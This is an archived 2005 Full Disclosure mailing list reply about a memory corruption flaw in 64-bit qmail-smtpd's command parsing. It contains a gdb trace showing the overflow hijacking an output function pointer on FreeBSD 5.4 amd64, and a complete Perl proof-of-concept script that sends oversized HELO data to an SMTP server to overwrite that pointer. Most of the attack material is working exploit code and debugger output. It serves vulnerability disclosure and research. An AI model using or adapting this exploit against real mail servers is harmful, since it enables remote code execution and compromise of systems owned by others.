Full Disclosure mailing list archives
Re: 64 bit qmail fun
From: Georgi Guninski <guninski () guninski com>
Date: Sun, 15 May 2005 15:48:49 +0300
On Fri, May 06, 2005 at 04:01:07PM +0300, Georgi Guninski wrote:
2. pointer + signed int in commands.c int i; ... i = str_chr(cmd.s,' '); ... cmd.s[i] = 0;
problem #2 is exploitable at least on freebsd 5.4 amd64 with a lot of virtual memory. original djb's qmail was compiled with debug info, no optimizations and not stripped. Breakpoint 1, commands (ss=0x507520, c=0x507540) at commands.c:34 34 cmd.s[i] = 0; (gdb) p cmd $12 = {s = 0x4b507000 'Ь' <repeats 200 times>..., len = 3036683527, ^^^^^^^^^^ a = 3184650962} (gdb) p i $13 = -1258283773 (gdb) p &cmd.s[i] $14 = 0x508d03 "K" (gdb) next 36 for (i = 0;c[i].text;++i) if (case_equals(c[i].text,cmd.s)) break; (gdb) p cmd $15 = {s = 0x507000 " server failed (#4.4.2)", len = 3036683527, ^^^^^^^^^^^^^ a = 3184650962} (gdb) p &ssout $16 = (substdio *) 0x507500 (gdb) p &ssout.op $17 = (int (**)()) 0x507518 (gdb) cont Program received signal SIGTRAP, Trace/breakpoint trap. 0x000000000050cbac in ?? () (gdb) x/i $rip 0x50cbac: int3 (gdb) p ssout $18 = { x = 0x102030405060708 <Error reading address 0x102030405060708: Bad address>, p = 0, n = 32, fd = 2, op = 0x50cbab} (gdb) info stack #0 0x000000000050cbac in ?? () #1 0x0000000000405bce in allwrite (op=0x50cbab, fd=2, buf=0x102030405060708 <Error reading address 0x102030405060708: Bad address>, len=16) at substdo.c:15 #2 0x0000000000405c63 in substdio_flush (s=0x507500) at substdo.c:35 #3 0x0000000000405d6e in substdio_put (s=0x507500, buf=0x406988 "502 unimplemented (#5.5.1)\r\n", len=28) at substdo.c:64 #4 0x0000000000405efc in substdio_puts (s=0x507500, buf=0x406988 "502 unimplemented (#5.5.1)\r\n") at substdo.c:100 #5 0x0000000000400daf in out (s=0x406988 "502 unimplemented (#5.5.1)\r\n") at qmail-smtpd.c:43 #6 0x0000000000400f13 in err_unimpl () at qmail-smtpd.c:54 (gdb) x/i helohost.s 0x50c000: int3 (gdb) p &cmd $19 = (stralloc *) 0x508d00 qmlong-pubvvv5.pl - run on freebsd 5.4 amd64 ------------------------ #!/usr/bin/perl -w # copyright georgi guninski # cannot be used in vulnerability databases use IO::Socket; my $host=$ARGV[0] || "localhost"; my $port=$ARGV[1] || 25; my $sock=IO::Socket::INET->new(Proto => 'TCP',PeerAddr => $host, PeerPort=>$port) || die("socket"); #my $sock; #open ($sock, '+>',"/dev/null") || die("open"); ##my $wriaddr = 0xb5bfa660 - 0x140; my $wriaddr = 0xb5001e43 - 0x140; my $wrimeg = int($wriaddr/(1024*1024)) ; my $wrioff = $wriaddr % (1024*1024) ; my $headdr = 0x42aa6000; my $heameg = int($headdr/(1024*1024)); my $heaoff = $headdr % (1024*1024); print $wrimeg . " " . $wrioff; my $payload="\xcc" x (1024*1024); my $i=0; print $sock "HELO "; while(42) { print $sock $payload; $i++; print "${i}\n"; if ($i == $heameg) {last;} } print $sock "v" x $heaoff; print $sock "\r\n"; print "\nHELO sent\n"; $i=0; while(42) { print $sock $payload; $i++; print "${i}\n"; if ($i == $wrimeg) {last;} } my $zer1 = "v" x $wrioff . " vvv\r\n"; print $zer1; print $sock $zer1; print "\nspace/zero sent\n"; $i=0; my $vvover= "AB" . ("v" x (0x500-2)); $vvover .= pack("Q",0x0102030405060708); #x $vvover .= pack("I",0x10); $vvover .= pack("I",0x20); $vvover .= pack("I",0x2); $vvover .= pack("I",0x42); $vvover .= pack("Q",0x50cbab); #op $vvover .= "\x21" . "\n" x 100; ## ^^^ ssin.x + 1 print $sock $vvover; print "\nprobably done\n"; while(42) {}; -- where do you want bill gates to go today? ** junk _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- 64 bit qmail fun Georgi Guninski (May 06)
- Re: 64 bit qmail fun Lars Olsson (May 06)
- Re: 64 bit qmail fun Georgi Guninski (May 09)
- Re: 64 bit qmail fun Georgi Guninski (May 15)